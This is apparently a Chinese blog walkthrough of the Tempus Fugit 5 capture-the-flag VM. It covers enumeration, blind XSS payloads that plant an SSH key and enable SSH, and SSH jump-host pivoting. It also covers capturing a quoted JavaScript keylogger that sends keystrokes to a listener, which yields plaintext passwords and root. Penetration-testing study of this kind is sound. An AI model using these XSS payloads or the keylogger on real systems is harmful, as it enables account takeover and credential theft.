OSCP-Tempus-Fugit-5v2

binggo

Story:

Recovered from the security disaster that was Tempus Fugit 4, our friends at Mofo company returned to the warm bosom of Linux. They have developed a sensational Internet application and have protected it with all sorts of fancy tooling. Deploying new technology and cool security features, they are confident that they can now withstand the worst of the worst. But, being hacked so many times, may the real danger be lurking from within?? Hack TF5 and find out for yourself!, @theart42 and @4nqr34z

信息搜集

定ip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
inet 192.168.175.130 netmask 255.255.255.0 broadcast 192.168.175.255
inet6 fe80::20c:29ff:fe54:8a6e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:54:8a:6e txqueuelen 1000 (Ethernet)
RX packets 66 bytes 7961 (7.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 101 bytes 41649 (40.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

└─$ nmap -p- -sV -sT -O 192.168.175.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-07-04 20:30 CST
Nmap scan report for localhost (192.168.175.135)
Host is up (0.00049s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http nginx
MAC Address: 00:0C:29:4F:B6:73 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

测目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.175.135/~FUZZ -t 64
# dirsearch -u
gobuster dir -u http://192.168.175.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt

└─$ gobuster dir -u http://192.168.175.135/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html,txt
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.175.135/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: php,html,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 628]
Progress: 350648 / 350648 (100.00%)
===============================================================
Finished
===============================================================

入端口(#实习后才对@后缀的内容有意识,算是涨姿势了)

1
2
3
4
5
6
7
Welcome to nginx!
If you see this page, the nginx web server is successfully installed and working. Further configuration is required.

For online documentation and support please refer to nginx.org.
Commercial support is available at nginx.com.

Thank you for using nginx, admin@mofo.org.

加解析

1
2
3
4
5
6
7
8
9
10
11
vim /etc/hosts
192.168.175.135 mofo.org

find /usr -type f -name "*subdomains*20000*"

gobuster vhost -u http://mofo.org -w /usr/share/amass/wordlists/subdomains-top1mil-20000.txt --append-domain

#筛
admin.mofo.org Status: 403 [Size: 151]
www.mofo.org Status: 200 [Size: 5730]
snap.mofo.org Status: 200 [Size: 1143]

加加加加到厌倦,然后一眼顶针

1
2
3
192.168.175.135    admin.mofo.org 403
192.168.175.135 www.mofo.org 200
192.168.175.135 snap.mofo.org 200

bXSS注入

snap处快照可查看admin.mofo.org,思路是在support处bxss注入启用ssh服务

1
http://admin.mofo.org/key  home  staff logs

1
<script>document.location='http://192.168.175.130:8000'</script>

1
2
3
└─# python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.175.135 - - [09/Jul/2026 15:19:02] "GET / HTTP/1.1" 200 -

劫持成功,上传key

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
└─# ssh-keygen -t rsa -b 4096
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase for "/root/.ssh/id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:tzU+R/w6ip7fZn9GsZoJLZ5ag5RPf3cSI5kuldJyhFI root@localhost
The key's randomart image is:
+---[RSA 4096]----+
| E |
| . . |
| . . . |
| ..o = . |
| So+.% = o|
| ..+%.= =.|
| .++B.*o+|
| .*.B=o=|
| o=.o+o+o|
+----[SHA256]-----+

└─# cat ~/.ssh/id_rsa.pub
1
<img src=x onerror="var xhr=new XMLHttpRequest(),fd=new FormData();fd.append('file',new Blob(['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC8EThZl6CvGn1AXafPsVtkHs/JHOwDTakjqJlS9cxQmPnqKWCIw09sfPCIJJxl3GkAA2UJ1EDK3YIr6TCwbJhYbKh0G8ytTRdorpkrACj7POU+e0n0D8BT54c0zG1gt0OFpQvPyguE7wPbfgvu0a5pfIKdGTURJpTjvmP2R9JIVX2MUU9P4JqZBBqEtD34X+nL94XFchh2Y4o2Su8TzPWW6eOVzbJc4j3kil3M6SRlgpY14Rbr0TB29lvA5BUt+JrVmco3NTJ/fhOwJkbauYbqfOrSp8qM+YX4k3DCljChxTwaBp1RWXep+t8D3vmcyZD5D6flz6ppgA4qvu+mEIeM0YqfepmGcVT41DdhgyHU+xu8lPrflKb6ELfxFgvvvlRBvBVoNrJT7Fvwhqgp2APkzrS9YrTG1e3DHPXmGLsyWb+QJpoc//fpl431zyfgE//J2gXKlrGlKbKMlFUlQQemEuKz7dBSCH4AcydufVuS4CG80zjEGkAiPhHeVzn8HVfgI+pDUyW5lB8E8Og/efylwkd5aIIZWpE1m0FAU3VLIDyXKvw5c79yXMDAZJm3J0kbVNj1KEIzbpHHepWy3E7L6vFVEZPl+gxqH7PU3KJ7WQW+v8rdEUC8p2n6+f9n7v3fz5xIJhdnnsM3EpWlca10yFxBhr9lh9b1z5MdtHJWPw== ma5k@localhost'],{type:'application/octet-stream'}),'id_rsa.pub');fd.append('Submit','Submit');xhr.open('POST','http://admin.mofo.org/key',false);xhr.send(fd);">

主页面启用ssh

1
<img src=x onerror="var xhr=new XMLHttpRequest();xhr.open('POST','http://admin.mofo.org/',false);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xhr.send('Submit=Enable SSH');">

ssh跳板

ssh传key的用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ nmap -p- 192.168.175.135           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-07-09 17:06 CST
Nmap scan report for mofo.org (192.168.175.135)
Host is up (0.00051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1

#sV探测服务指纹
└─$ nmap -p2222 -sV 192.168.175.135
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-07-11 18:50 CST
Nmap scan report for mofo.org (192.168.175.135)
Host is up (0.00029s latency).

PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 8.1 (protocol 2.0)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
└─$ ssh -i ~/.ssh/id_rsa ctorres@192.168.175.135 -p 2222
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html

___________ ___________ .__ __
\__ ___/ ____ _____ ______ __ __ ______ \_ _____/ __ __ ____ |__|_/ |_
| | _/ __ \ / \ \____ \ | | \ / ___/ | __) | | \ / ___\ | |\ __\
| | \ ___/ | Y Y \| |_> >| | / \___ \ | \ | | / / /_/ >| | | |
|____| \___ >|__|_| /| __/ |____/ /____ > \___ / |____/ \___ / |__| |__|
\/ \/ |__| \/ \/ /_____/

Interactive logins are disabled on this stepping stone...

This account is not available
Connection to 192.168.175.135 closed.

登录不成功,但是登录状态里已经给出提示了,可以拿来当跳板机,靶机每次启动时对应下方ip的用户是不固定的,可以视为用户均有跳转该ip的情况,所以可在原有用户名上复用

1
ssh -i ~/.ssh/id_rsa -J ctorres@192.168.175.135:2222 ctorres@192.168.150.1 

这里一开始也是遇到了ssh连接失败的情况,ctorres会下意识鬼脑成ctoress,出现下方报错,但是也算是学到了,遇到这种情况如何排查ssh连接问题并解决

1
2
3
4
5
6
7
8
9
Permission denied (publickey, keyboard-interactive).
Connection closed by UNKNOWN port 65535

ssh -i ~/.ssh/id_rsa -J ctorres@192.168.175.135:2222 ctorres@192.168.150.1 -vv
#加个-vv查看交互日志确定密钥是否交换,通信等问题排查即可
#日志里可以看到要求id_rsa在./ssh路径下

#也可以不修改路径启用代理命令
ssh -o ProxyCommand="ssh -i ./id_rsa -W %h:%p -p 2222 ctorres@192.168.175.135" -i ./id_rsa ctorres@192.168.150.1

内网渗透

Mutt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
ctorres@TempusFugit5:~$ ls -hail
total 48K
152272 drwxr-xr-x 6 ctorres ctorres 4.0K Feb 24 2020 .
131074 drwxr-xr-x 4 root root 4.0K Feb 20 2020 ..
149129 lrwxrwxrwx 1 ctorres ctorres 9 Feb 20 2020 .bash_history -> /dev/null
152273 -rw-r--r-- 1 ctorres ctorres 220 Feb 20 2020 .bash_logout
152275 -rw-r--r-- 1 ctorres ctorres 3.5K Feb 20 2020 .bashrc
152886 drwx------ 3 ctorres ctorres 4.0K Feb 21 2020 .gnupg
550859 drwx------ 3 ctorres ctorres 4.0K Feb 24 2020 .local
550872 drwx------ 2 ctorres ctorres 4.0K Feb 24 2020 Mail
152274 -rw-r--r-- 1 ctorres ctorres 807 Feb 20 2020 .profile
155770 -rw------- 1 ctorres ctorres 4.6K Feb 24 2020 sent
152276 drwx------ 2 ctorres ctorres 4.0K Feb 22 2020 .ssh
152887 -rwxrwx--- 1 ctorres ctorres 129 Feb 21 2020 user.txt
ctorres@TempusFugit5:~$ cat user.txt
8b65b3ce27264a757c4a86571a9786217d855789028aa40d84cfc980adeb71de8bb1e75d882fec76fdcc3750d28e8245889d603d11345087e85d2c040baff6ae

只能说还得是老师傅细,自己第一遍过的时候没注意到ssh登录后的邮件提示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
ctorres@TempusFugit5:~$ cat sent
From ctorres@TempusFugit5.mofo.org Mon Feb 24 18:20:51 2020
Date: Mon, 24 Feb 2020 18:20:51 +0100
From: Clee Torres <ctorres@TempusFugit5.mofo.org>
To: Hugh Janus <hjanus@TempusFugit5.mofo.org>
Subject: Re: Sudo right
Message-ID: <20200224172051.GA2947@TempusFugit5.mofo.org>
References: <20200224171915.GA2797@TempusFugit5.mofo.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20200224171915.GA2797@TempusFugit5.mofo.org>
User-Agent: Mutt/1.10.1 (2018-07-13)
Status: RO
Content-Length: 357
Lines: 16

...............................................................
Payload is added. Soon we will have all his secrets ;-)!

注意到mutt邮件客户端,邮件里吃瓜,也算是跟自己实习接触到的日常很贴近了,依旧甩锅这一块

1
ctorres@TempusFugit5:~$ mutt -R -f ./sent

得出结论:开发跟安全扯皮,对外发邮件表示自己注入了payload

这里思路还是学到了,优先去考虑服务器涉及的内容,关注邮件的pass主题

1
2
3
4
5
6
7
8
9
10
11
ctorres@TempusFugit5:~$ arp
-bash: arp: command not found
ctorres@TempusFugit5:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 TempusFugit5.mofo.org TempusFugit5
192.168.150.1 tempusfugit5.mofo.org
192.168.150.10 snap.mofo.org
192.168.150.11 www.mofo.org
192.168.150.13 surfer.mofo.org
192.168.150.15 pass.mofo.org
192.168.150.1 admin.mofo.org
1
2
3
4
5
6
7
curl -s pass.mofo.org

//payback is a Bitch, Hugh!
//I am gonna bleed you dry...
document.onkeypress = function logKey(k) {
new Image().src='http://192.168.150.1:4444/keylog.php?key='+k.which;
}

键盘劫持

1
2
3
4
5
6
7
8
9
10
11
12
13
python3 -m http.server 4444 
python3 -u -m http.server --bind 192.168.150.1 4444 2>&1 | tee -a keylog

eg.
192.168.150.10 - - [11/Jul/2026 14:20:07] code 404, message File not found
192.168.150.10 - - [11/Jul/2026 14:20:07] "GET /keylog.php?key=86 HTTP/1.1" 404 -
192.168.150.10 - - [11/Jul/2026 14:20:07] code 404, message File not found
192.168.150.10 - - [11/Jul/2026 14:20:07] "GET /keylog.php?key=66 HTTP/1.1" 404 -

wc -l keylog
97
grep -iE 'key=' keylog | awk -F'key=' '{print $2}' | awk '{printf "%c",$1} END {print ""}'
hjanusisHi5CmhKNl9Tr0vVB

提权

键盘记录的像是登录密码,那么思路就是借助跳板机转发端口建立连接进入后台

1
2
3
ssh -J ctorres@10.10.10.44:2222 -N -L 5444:192.168.150.15:80 ctorres@192.168.150.1

ssh -i ~/.ssh/id_rsa -J ctorres@192.168.175.135:2222 -N -L 81:192.168.150.15:80 ctorres@192.168.150.1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
hjanus isHi5CmhKNl9Tr0vVB
su
>,sdrXCaNaKj

root@TempusFugit5:/home/ctorres# whoami
root
root@TempusFugit5:/home/ctorres# ls -hail /root
total 60K
786444 drwx------ 9 root root 4.0K Feb 24 2020 .
2 drwxr-xr-x 18 root root 4.0K Feb 15 2020 ..
802289 lrwxrwxrwx 1 root root 9 Feb 20 2020 .bash_history -> /dev/null
786446 -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
802288 drwxr-xr-x 2 root root 4.0K Jul 11 12:28 commands
424863 drwx------ 3 root root 4.0K Feb 23 2020 .config
788404 drwx------ 2 root root 4.0K Feb 15 2020 .docker
802290 -rwxr-xr-x 1 root root 203 Feb 21 2020 do.sh
788399 drwxr-xr-x 2 root root 4.0K Feb 15 2020 .electron
788401 drwx------ 3 root root 4.0K Feb 15 2020 .gnupg
802294 drwxr-xr-x 3 root root 4.0K Feb 20 2020 .local
786433 drwxr-xr-x 4 root root 4.0K Feb 15 2020 .npm
786445 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
808737 -rwxr-xr-x 1 root root 532 Feb 24 2020 proof.sh
802297 -rw-r--r-- 1 root root 66 Feb 20 2020 .selected_editor
799581 -rw-r--r-- 1 root root 165 Feb 19 2020 .wget-hsts

proof 证明
./proof.sh

mmm m m m m
m" " mmm m mm mmmm m mm mmm mm#mm mmm # # #
# #" "# #" # #" "# #" " " # # # " # # #
# # # # # # # # m"""# # """m " " "
"mmm" "#m#" # # "#m"# # "mm"# "mm "mmm" # # #
m #
""
Tempus Fugit 5 pwned...
_____________________________________________________________________

Proof: dc77299487a72c64bbe1adeddf9dfcc2cf1045aacd463be456448c103e51b5a7
Path: /root
Date: Sat 11 Jul 2026 02:50:40 PM CEST
who are you: root
_____________________________________________________________________


You display the wonderful traits of charm and courtesy.
By @4nqr34z and @theart42

Thanks to our fellow teammates in @m0t13ycr3w for betatesting! ;-)

总结

渗透思维:

403 内部访问视角

ARP、Host头域名解析

bXSS 执行上下文

端口转发跳板机

邮件矛盾,内部人员投毒

密码泄露 凭据复用,权限升级

Refer

https://mxc.life/2026/04/08/tempus-fugit-5-2-%e9%9d%b6%e6%9c%ba/

靶机精讲


OSCP-Tempus-Fugit-5v2
https://alenirving.github.io/2026/07/11/OSCP-Tempus-Fugit-5v2/
作者
Ma5k
许可协议
CC-BY-NC-SA